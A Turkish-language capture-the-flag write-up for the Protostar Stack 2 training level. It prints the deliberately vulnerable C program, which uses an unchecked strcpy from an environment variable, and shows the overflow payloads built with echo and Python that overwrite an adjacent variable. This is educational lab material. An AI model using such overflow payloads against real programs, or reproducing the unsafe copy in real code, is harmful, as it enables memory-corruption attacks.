Register Now

Login

Lost Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Login

Register Now

Canyoupwn.me ~

TR | Protostar: Stack 2 Writeup

Stack2.c

Amaç: “you have correctly got the variable to the right value” satırını yazdırmak.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];
 char *variable;

 variable = getenv("GREENIE");

 if(variable == NULL) {
   errx(1, "please set the GREENIE environment variable\n");
 }

 modified = 0;

 strcpy(buffer, variable);

 if(modified == 0x0d0a0d0a) {
   printf("you have correctly modified the variable\n");
 } else {
   printf("Try again, you got 0x%08x\n", modified);
 }

}

Bu seviyede de istediğimiz cümleyi yazdırabilmek için programın akışını bir şekilde değiştirmemiz gerekiyor. Önceki seviyede modified değişkeni 0x61626364 olması yeterken şimdi kabuktaki GREENIE değişkeni 0x0d0a0d0a olmalı.

Programın Çalıştırılması

[email protected]:/opt/protostar/bin$ ./stack2
stack2: please set the GREENIE environment variable

Program çalıştırıldığı zaman bir önceki seviyedeki gibi herhangi bir input beklemeden, GREENIE değerini atamamızı istiyor. Bir önceki seviyeden farkı sadece programa doğrudan değil dolaylı yoldan Kabuk değişkenini kullanarak program akışını değiştirecek olmamız.

Bu seviyeyide aynı şekilde uzun bir text verdikten sonra modified değişkenini değiştirip programın akışını istediğimiz şekilde yönlendirebiliriz. Bunun için öncelikle bufferımızı doldurup modified’in değerini değiştirebildiğimizi görelim.

# 64 Tane "A" karakteri
[email protected]:/opt/protostar/bin$ export GREENIE='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' ;
./stack2
Try again, you got 0x00000000

# 64 Tane "A" karakteri + 4 tane B
[email protected]:/opt/protostar/bin$ export GREENIE='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB' ; ./stack2
Try again, you got 0x42424242

Evet bu şekilde modified değişkenini istediğimiz şekilde değiştirebildiğimize göre bölümü bitirmek için istenilen değeri yazabilliriz.

Modified Değişkenini Değiştirilmesi

Koddaki if(modified == 0x0d0a0d0a) değerini Little Endiana göre yazdığım 0a0d0a0d yani \x0a\x0d\x0a\x0d değerini yazmam gerektiğini görüyorum. Bunu iki şekilde basitçe payloadıma ekleyebilirim.

Echo ile “\x0a\x0d\x0a\x0d” değerini yazdırmak istersem, hex sayıları yazdırabilmem için -e parametresini ekliyorum.

[email protected]:/opt/protostar/bin$ export GREENIE=$(echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0a\x0d\x0a\x0d')
[email protected]:/opt/protostar/bin$ ./stack2
you have correctly modified the variable

Python ile:

[email protected]:/opt/protostar/bin$ export GREENIE=$(python -c 'print 64*"A"+"\x0a\x0d\x0a\x0d"')
[email protected]:/opt/protostar/bin$ ./stack2
you have correctly modified the variable

About Emir Kurt